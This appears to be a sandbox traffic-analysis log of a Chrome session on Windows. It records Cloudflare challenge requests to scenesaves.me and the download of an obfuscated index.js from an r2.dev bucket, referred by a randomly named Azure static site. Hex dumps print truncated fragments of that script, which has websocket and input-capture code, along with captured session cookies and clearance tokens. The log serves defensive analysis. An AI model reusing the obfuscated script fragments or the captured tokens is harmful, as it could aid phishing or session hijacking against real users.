                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC388INData Raw: 70 65 4f 66 2c 73 74 72 69 6e 67 69 66 79 2c 6d 61 70 2c 69 6e 63 6c 75 64 65 73 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 6d 70 55 61 4c 32 3b 46 78 4f 6e 72 33 3b 4b 55 6a 49 78 33 3b 74 6c 4c 72 4b 32 3b 59 76 50 64 36 3b 65 58 44 6c 4c 34 3b 74 50 6f 68 52 32 3b 4a 65 75 68 67 31 3b 46 72 4e 42 69 35 3b 54 4d 4d 78 35 3b 48 63 54 45 49 33 3b 69 48 77 78 4d 33 3b 56 67 75 79 36 3b 48 76 6d 72 33 3b 4f 75 57 54 37 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 6b 65 79 73 2c 72 65 70 6c 61 63 65 2c 6c 6f 61 64 69 6e 67 2c 70 75 73 68 2c 25 32 62 2c 53 65 74 2c 4d 65 73 73 61 67 65 3a 20 2c 74 6f 53 74 72 69 6e 67 2c 63 68 63 74 78 2c 31 35 30 35 33 34 55 74 75 57 72 63 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64
                                                                                                                                                                                                                                Data Ascii: peOf,stringify,map,includes,_cf_chl_opt;mpUaL2;FxOnr3;KUjIx3;tlLrK2;YvPd6;eXDlL4;tPohR2;Jeuhg1;FrNBi5;TMMx5;HcTEI3;iHwxM3;Vguy6;Hvmr3;OuWT7,contentWindow,fromCharCode,keys,replace,loading,push,%2b,Set,Message: ,toString,chctx,150534UtuWrc,DOMContentLoaded


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.449768188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1010OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8ccfd79aee41159f HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 15886
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://scenesaves.me
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC15886OUTData Raw: 7b 22 77 70 22 3a 22 62 42 39 4f 4e 30 69 51 4e 4c 39 4e 47 58 79 69 70 69 5a 61 36 4f 30 50 61 72 66 61 4b 56 4b 46 46 30 51 69 64 37 61 2b 6b 50 7a 6b 78 39 61 6d 2b 73 49 79 6b 4c 69 4a 61 47 70 39 68 31 42 42 61 72 4d 46 61 32 61 46 50 46 39 69 61 55 46 69 6e 79 59 4f 4d 4c 42 6a 74 45 4f 2b 6b 48 42 66 72 63 4a 5a 58 68 76 4f 6e 48 4e 6f 66 77 69 63 37 2b 4d 4b 61 4e 39 39 71 4b 6d 30 6a 31 61 6c 68 31 78 41 6a 61 41 4f 58 6d 61 30 6f 39 61 4b 4f 30 30 4f 48 47 4f 4b 61 69 6b 61 36 4c 34 61 69 77 6a 61 33 52 51 72 68 42 73 69 72 4d 31 39 61 30 52 6a 61 30 79 49 36 61 49 30 61 69 6a 55 78 43 39 45 4a 66 50 30 68 30 69 41 6e 66 42 37 4e 48 53 38 41 2b 61 56 4f 30 4b 24 35 42 61 51 34 42 6b 58 78 2b 54 55 68 61 49 38 41 4d 48 56 72 4f 61 43 4d 56 78 4b
                                                                                                                                                                                                                                Data Ascii: {"wp":"bB9ON0iQNL9NGXyipiZa6O0ParfaKVKFF0Qid7a+kPzkx9am+sIykLiJaGp9h1BBarMFa2aFPF9iaUFinyYOMLBjtEO+kHBfrcJZXhvOnHNofwic7+MKaN99qKm0j1alh1xAjaAOXma0o9aKO00OHGOKaika6L4aiwja3RQrhBsirM19a0Rja0yI6aI0aijUxC9EJfP0h0iAnfB7NHS8A+aVO0K$5BaQ4BkXx+TUhaI8AMHVrOaCMVxK
                                                                                                                                                                                                                                2024-10-03 20:57:03 UTC1222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:03 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.scenesaves.me; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                Set-Cookie: cf_clearance=rr8HuoYCD2MOlpAaX.B_tJFc1cIsh.cOZKZwCzDPaI8-1727989023-1.2.1.1-V7YOfLfLU3igwbdmFqKGzai0MF1BJcNgDoVNYys0rN8PsPiRY2vjAFAAkrEinRmYVSZOuJKqSodwFE5IsT_OOBEsEnFrpX62Zy9nlBlsLIOcsuEVTw1SStXKcfdc8T5fo6RZtVBCNxydVQkC3UHaHVt4hsFe8PYXpXclQe92o9iYdYZj10sgk5Vi1SOpgr34yXJDnRKQHkq.0aNJRULIB7dqtV0RVCAvS4rrFKPBfgzCGMkmrYl8zb_6v_Ft6uAdJbzjzaeiwKLR_QiIVUKbshlkiofxBtUZgZAqNWiAejNimAw_bTeg4Pr3kVAcnCI1WKmHlhp2GTtJgdA3GhLpwCGF9iy6foXOFZ7sCV_GEqz3HufLXBUMmu9IojwO6J3i; Path=/; Expires=Fri, 03-Oct-25 20:57:03 GMT; Domain=.scenesaves.me; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwpE30sV5MzW0vgMiJraxAWbdWv7nj%2BP3j8gVkpPmrunmoODWLANkpLfEcMCRVPo6CaQ8Cc%2F8SGJ1QViRBtg%2BM3y8ShUfFxK6z1h15Om8Vqq41q0zSLujnznVf%2BzSr7I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7a64e694358-EWR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.449771104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC584OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC356INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:04 GMT
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7ab6df88c75-EWR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.449773162.159.140.2374432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC630OUTGET /index.js HTTP/1.1
                                                                                                                                                                                                                                Host: pub-cb72f4af1674441897427b55eaf679a1.r2.dev
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:04 GMT
                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                Content-Length: 159727
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                ETag: "4960c5865c772515185324d4d78c3af8"
                                                                                                                                                                                                                                Last-Modified: Thu, 22 Aug 2024 15:49:10 GMT
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7ab98115e74-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1033INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 31 39 39 33 33 32 3d 61 30 5f 30 78 31 31 39 38 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 61 33 39 30 34 2c 5f 30 78 31 36 35 33 61 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 31 61 62 38 65 3d 61 30 5f 30 78 31 31 39 38 2c 5f 30 78 34 33 30 65 38 65 3d 5f 30 78 34 61 33 39 30 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 62 37 39 65 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 31 65 35 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 31 66 63 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 34 39 39 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28
                                                                                                                                                                                                                                Data Ascii: const a0_0x199332=a0_0x1198;(function(_0x4a3904,_0x1653af){const _0x31ab8e=a0_0x1198,_0x430e8e=_0x4a3904();while(!![]){try{const _0x5b79e2=-parseInt(_0x31ab8e(0x1e5))/0x1+-parseInt(_0x31ab8e(0x1fc))/0x2+parseInt(_0x31ab8e(0x499))/0x3*(-parseInt(_0x31ab8e(
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 5b 27 63 72 65 61 74 65 45 6c 65 6d 27 2b 5f 30 78 35 39 39 33 37 37 28 30 78 34 62 38 29 5d 28 5f 30 78 35 39 39 33 37 37 28 30 78 34 36 34 29 29 5b 27 72 65 6c 4c 69 73 74 27 5d 3b 69 66 28 5f 30 78 33 35 61 35 30 63 26 26 5f 30 78 33 35 61 35 30 63 5b 5f 30 78 35 39 39 33 37 37 28 30 78 32 65 36 29 5d 26 26 5f 30 78 33 35 61 35 30 63 5b 5f 30 78 35 39 39 33 37 37 28 30 78 32 65 36 29 5d 28 5f 30 78 35 39 39 33 37 37 28 30 78 32 66 65 29 2b 5f 30 78 35 39 39 33 37 37 28 30 78 32 32 63 29 29 29 72 65 74 75 72 6e 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 34 35 63 37 64 34 20 6f 66 20 64 6f 63 75 6d 65 6e 74 5b 27 71 75 65 72 79 53 65 6c 65 63 27 2b 5f 30 78 35 39 39 33 37 37 28 30 78 34 63 65 29 5d 28 27 6c 69 6e 6b 5b 72 65 6c 3d 5c 78 32 32 27 2b 27 6d
                                                                                                                                                                                                                                Data Ascii: ['createElem'+_0x599377(0x4b8)](_0x599377(0x464))['relList'];if(_0x35a50c&&_0x35a50c[_0x599377(0x2e6)]&&_0x35a50c[_0x599377(0x2e6)](_0x599377(0x2fe)+_0x599377(0x22c)))return;for(const _0x45c7d4 of document['querySelec'+_0x599377(0x4ce)]('link[rel=\x22'+'m
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 5d 3d 21 30 78 30 3b 63 6f 6e 73 74 20 5f 30 78 31 33 65 62 30 33 3d 5f 30 78 35 34 65 39 66 34 28 5f 30 78 31 30 30 38 33 33 29 3b 66 65 74 63 68 28 5f 30 78 31 30 30 38 33 33 5b 27 68 72 65 66 27 5d 2c 5f 30 78 31 33 65 62 30 33 29 3b 7d 7d 28 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 65 28 5f 30 78 32 61 31 35 37 30 2c 5f 30 78 32 33 32 66 66 65 3d 30 78 33 32 2c 5f 30 78 33 30 36 34 66 34 3d 7b 7d 29 7b 63 6f 6e 73 74 20 5f 30 78 32 62 31 38 38 33 3d 61 30 5f 30 78 31 39 39 33 33 32 3b 6c 65 74 20 5f 30 78 35 62 38 39 62 34 3b 63 6f 6e 73 74 20 5f 30 78 33 35 39 35 61 66 3d 5f 30 78 33 30 36 34 66 34 5b 5f 30 78 32 62 31 38 38 33 28 30 78 33 64 31 29 2b 27 65 27 5d 3f 3f 21 30 78 31 2c 7b 6d 61 78 57 61 69 74 3a 5f 30 78 32 37 66 38 33 61 7d 3d 5f 30 78
                                                                                                                                                                                                                                Data Ascii: ]=!0x0;const _0x13eb03=_0x54e9f4(_0x100833);fetch(_0x100833['href'],_0x13eb03);}}());function ne(_0x2a1570,_0x232ffe=0x32,_0x3064f4={}){const _0x2b1883=a0_0x199332;let _0x5b89b4;const _0x3595af=_0x3064f4[_0x2b1883(0x3d1)+'e']??!0x1,{maxWait:_0x27f83a}=_0x
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 30 78 34 65 65 63 35 63 3d 5f 30 78 32 62 31 38 38 33 3b 5f 30 78 34 65 65 63 35 63 28 30 78 33 37 39 29 21 3d 3d 5f 30 78 34 65 65 63 35 63 28 30 78 33 37 39 29 3f 28 74 68 69 73 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 3d 5f 30 78 34 65 65 63 35 63 28 30 78 33 37 33 29 2c 5f 30 78 32 66 32 37 66 31 28 29 29 3a 5f 30 78 35 62 38 39 62 34 21 3d 3d 76 6f 69 64 20 30 78 30 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 5f 30 78 35 62 38 39 62 34 29 3b 7d 2c 5f 30 78 35 30 34 30 37 64 3b 7d 63 6f 6e 73 74 20 72 65 3d 5f 30 78 32 34 30 36 63 31 3d 3e 7b 6c 65 74 20 5f 30 78 66 65 33 35 65 62 3d 21 30 78 31 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 5f 30 78 35 38 37 63 31 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 66 65 33 35 65 62 3f 76 6f 69 64
                                                                                                                                                                                                                                Data Ascii: 0x4eec5c=_0x2b1883;_0x4eec5c(0x379)!==_0x4eec5c(0x379)?(this['readyState']=_0x4eec5c(0x373),_0x2f27f1()):_0x5b89b4!==void 0x0&&clearTimeout(_0x5b89b4);},_0x50407d;}const re=_0x2406c1=>{let _0xfe35eb=!0x1;return function(..._0x587c11){return _0xfe35eb?void
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 5f 30 78 34 62 37 66 61 31 7c 7c 27 27 29 29 2c 58 3d 28 5f 30 78 33 66 35 32 62 65 2c 5f 30 78 35 39 62 31 65 35 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 66 61 35 66 35 3d 61 30 5f 30 78 31 39 39 33 33 32 2c 5f 30 78 31 31 66 38 63 39 3d 6e 65 77 20 46 69 6c 65 52 65 61 64 65 72 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 66 38 63 39 5b 27 6f 6e 6c 6f 61 64 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 37 64 31 32 64 3d 61 30 5f 30 78 31 31 39 38 3b 69 66 28 5f 30 78 33 37 64 31 32 64 28 30 78 31 36 64 29 21 3d 3d 27 7a 6a 56 59 43 27 29 74 68 69 73 5b 5f 30 78 33 37 64 31 32 64 28 30 78 33 62 33 29 5d 28 29 2c 74 68 69 73 5b 5f 30 78 33 37 64 31 32 64 28 30 78 32 37 61 29 5d 28 27 69 6f 5c 78 32 30 73 65 72 76 65 72 5c 78 32
                                                                                                                                                                                                                                Data Ascii: _0x4b7fa1||'')),X=(_0x3f52be,_0x59b1e5)=>{const _0x1fa5f5=a0_0x199332,_0x11f8c9=new FileReader();return _0x11f8c9['onload']=function(){const _0x37d12d=a0_0x1198;if(_0x37d12d(0x16d)!=='zjVYC')this[_0x37d12d(0x3b3)](),this[_0x37d12d(0x27a)]('io\x20server\x2
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 61 35 34 66 66 28 30 78 34 32 36 29 5d 3d 3d 3d 30 78 34 26 26 28 5f 30 78 33 62 65 62 33 34 5b 5f 30 78 32 61 35 34 66 66 28 30 78 33 31 64 29 5d 3d 3d 3d 30 78 63 38 7c 7c 5f 30 78 33 61 32 34 65 37 5b 5f 30 78 32 61 35 34 66 66 28 30 78 33 31 64 29 5d 3d 3d 3d 30 78 34 63 37 3f 74 68 69 73 5b 5f 30 78 32 61 35 34 66 66 28 30 78 33 31 66 29 5d 28 29 3a 74 68 69 73 5b 5f 30 78 32 61 35 34 66 66 28 30 78 33 61 38 29 2b 27 46 6e 27 5d 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 64 30 38 31 65 30 3d 5f 30 78 32 61 35 34 66 66 3b 74 68 69 73 5b 5f 30 78 64 30 38 31 65 30 28 30 78 34 62 66 29 5d 28 74 79 70 65 6f 66 20 5f 30 78 61 62 63 36 65 62 5b 5f 30 78 64 30 38 31 65 30 28 30 78 33 31 64 29 5d 3d 3d 5f 30 78 64 30 38 31 65 30 28 30 78 33 61 35 29 3f 5f
                                                                                                                                                                                                                                Data Ascii: a54ff(0x426)]===0x4&&(_0x3beb34[_0x2a54ff(0x31d)]===0xc8||_0x3a24e7[_0x2a54ff(0x31d)]===0x4c7?this[_0x2a54ff(0x31f)]():this[_0x2a54ff(0x3a8)+'Fn'](()=>{const _0xd081e0=_0x2a54ff;this[_0xd081e0(0x4bf)](typeof _0xabc6eb[_0xd081e0(0x31d)]==_0xd081e0(0x3a5)?_
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 26 30 78 33 29 3c 3c 30 78 36 7c 5f 30 78 32 30 37 38 38 64 26 30 78 33 66 3b 72 65 74 75 72 6e 20 5f 30 78 61 38 39 31 38 33 3b 7d 2c 6b 65 3d 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 3d 3d 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 32 66 31 29 2c 4b 3d 28 5f 30 78 31 39 31 35 38 38 2c 5f 30 78 34 34 36 62 31 61 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 65 31 36 63 63 3d 61 30 5f 30 78 31 39 39 33 33 32 3b 69 66 28 74 79 70 65 6f 66 20 5f 30 78 31 39 31 35 38 38 21 3d 5f 30 78 35 65 31 36 63 63 28 30 78 31 61 30 29 29 72 65 74 75 72 6e 7b 27 74 79 70 65 27 3a 5f 30 78 35 65 31 36 63 63 28 30 78 34 35 37 29 2c 27 64 61 74 61 27 3a 68 65 28 5f 30 78 31 39 31 35 38 38 2c 5f 30 78 34 34 36 62 31 61 29 7d 3b 63 6f 6e 73 74 20 5f 30 78 35 65 39 37
                                                                                                                                                                                                                                Data Ascii: &0x3)<<0x6|_0x20788d&0x3f;return _0xa89183;},ke=typeof ArrayBuffer==a0_0x199332(0x2f1),K=(_0x191588,_0x446b1a)=>{const _0x5e16cc=a0_0x199332;if(typeof _0x191588!=_0x5e16cc(0x1a0))return{'type':_0x5e16cc(0x457),'data':he(_0x191588,_0x446b1a)};const _0x5e97
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 65 74 20 5f 30 78 32 34 63 61 30 66 3d 30 78 30 3b 5f 30 78 33 65 38 33 64 33 5b 5f 30 78 33 32 30 39 66 30 28 30 78 31 65 37 29 5d 28 28 5f 30 78 65 34 30 66 32 2c 5f 30 78 35 63 64 35 36 65 29 3d 3e 7b 71 28 5f 30 78 65 34 30 66 32 2c 21 30 78 31 2c 5f 30 78 35 37 65 61 36 33 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 32 63 62 65 32 34 3d 61 30 5f 30 78 31 31 39 38 3b 69 66 28 5f 30 78 32 63 62 65 32 34 28 30 78 34 35 32 29 3d 3d 3d 27 76 51 72 51 76 27 29 5f 30 78 34 31 36 66 31 38 5b 5f 30 78 35 63 64 35 36 65 5d 3d 5f 30 78 35 37 65 61 36 33 2c 2b 2b 5f 30 78 32 34 63 61 30 66 3d 3d 3d 5f 30 78 31 36 36 63 66 30 26 26 5f 30 78 32 32 61 33 64 65 28 5f 30 78 34 31 36 66 31 38 5b 5f 30 78 32 63 62 65 32 34 28 30 78 33 37 66 29 5d 28 6c 65 29 29 3b 65 6c 73 65
                                                                                                                                                                                                                                Data Ascii: et _0x24ca0f=0x0;_0x3e83d3[_0x3209f0(0x1e7)]((_0xe40f2,_0x5cd56e)=>{q(_0xe40f2,!0x1,_0x57ea63=>{const _0x2cbe24=a0_0x1198;if(_0x2cbe24(0x452)==='vQrQv')_0x416f18[_0x5cd56e]=_0x57ea63,++_0x24ca0f===_0x166cf0&&_0x22a3de(_0x416f18[_0x2cbe24(0x37f)](le));else
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 31 35 35 33 64 61 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 36 32 37 66 34 28 30 78 32 65 39 29 3d 3d 3d 5f 30 78 33 36 32 37 66 34 28 30 78 32 65 39 29 29 7b 5f 30 78 31 65 63 37 66 34 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 78 39 29 3b 63 6f 6e 73 74 20 5f 30 78 34 38 38 34 64 37 3d 6e 65 77 20 44 61 74 61 56 69 65 77 28 5f 30 78 31 65 63 37 66 34 5b 5f 30 78 33 36 32 37 66 34 28 30 78 33 35 65 29 5d 29 3b 5f 30 78 34 38 38 34 64 37 5b 5f 30 78 33 36 32 37 66 34 28 30 78 32 34 35 29 5d 28 30 78 30 2c 30 78 37 66 29 2c 5f 30 78 34 38 38 34 64 37 5b 5f 30 78 33 36 32 37 66 34 28 30 78 31 62 36 29 2b 27 36 34 27 5d 28 30 78 31 2c 42 69 67 49 6e 74 28 5f 30 78 31 35 35 33 64 61 29 29 3b 7d 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 32 36 39 31
                                                                                                                                                                                                                                Data Ascii: 1553da);}else{if(_0x3627f4(0x2e9)===_0x3627f4(0x2e9)){_0x1ec7f4=new Uint8Array(0x9);const _0x4884d7=new DataView(_0x1ec7f4[_0x3627f4(0x35e)]);_0x4884d7[_0x3627f4(0x245)](0x0,0x7f),_0x4884d7[_0x3627f4(0x1b6)+'64'](0x1,BigInt(_0x1553da));}else{const _0x2691
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC1369INData Raw: 30 78 35 65 63 34 35 37 5b 5f 30 78 33 36 32 37 66 34 28 30 78 33 35 63 29 2b 27 58 27 5d 7c 7c 30 78 30 2c 5f 30 78 34 35 64 38 37 61 5b 5f 30 78 33 36 32 37 66 34 28 30 78 34 32 39 29 5d 3d 5f 30 78 35 65 63 34 35 37 5b 5f 30 78 33 36 32 37 66 34 28 30 78 33 35 63 29 2b 27 59 27 5d 7c 7c 5f 30 78 35 65 63 34 35 37 5b 5f 30 78 33 36 32 37 66 34 28 30 78 33 35 63 29 5d 29 2c 5f 30 78 34 63 34 66 37 38 5b 5f 30 78 33 36 32 37 66 34 28 30 78 32 63 63 29 5d 28 5f 30 78 33 36 32 37 66 34 28 30 78 32 32 30 29 2b 27 74 27 2c 5f 30 78 34 35 64 38 37 61 29 2c 74 68 69 73 5b 27 77 73 43 6c 69 65 6e 74 27 5d 5b 5f 30 78 33 36 32 37 66 34 28 30 78 32 66 39 29 5d 28 5f 30 78 33 36 32 37 66 34 28 30 78 32 35 30 29 2b 5f 30 78 33 36 32 37 66 34 28 30 78 34 63 64 29 2c
                                                                                                                                                                                                                                Data Ascii: 0x5ec457[_0x3627f4(0x35c)+'X']||0x0,_0x45d87a[_0x3627f4(0x429)]=_0x5ec457[_0x3627f4(0x35c)+'Y']||_0x5ec457[_0x3627f4(0x35c)]),_0x4c4f78[_0x3627f4(0x2cc)](_0x3627f4(0x220)+'t',_0x45d87a),this['wsClient'][_0x3627f4(0x2f9)](_0x3627f4(0x250)+_0x3627f4(0x4cd),


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.449774188.114.97.34432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:04 UTC797OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1
                                                                                                                                                                                                                                Host: scenesaves.me
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
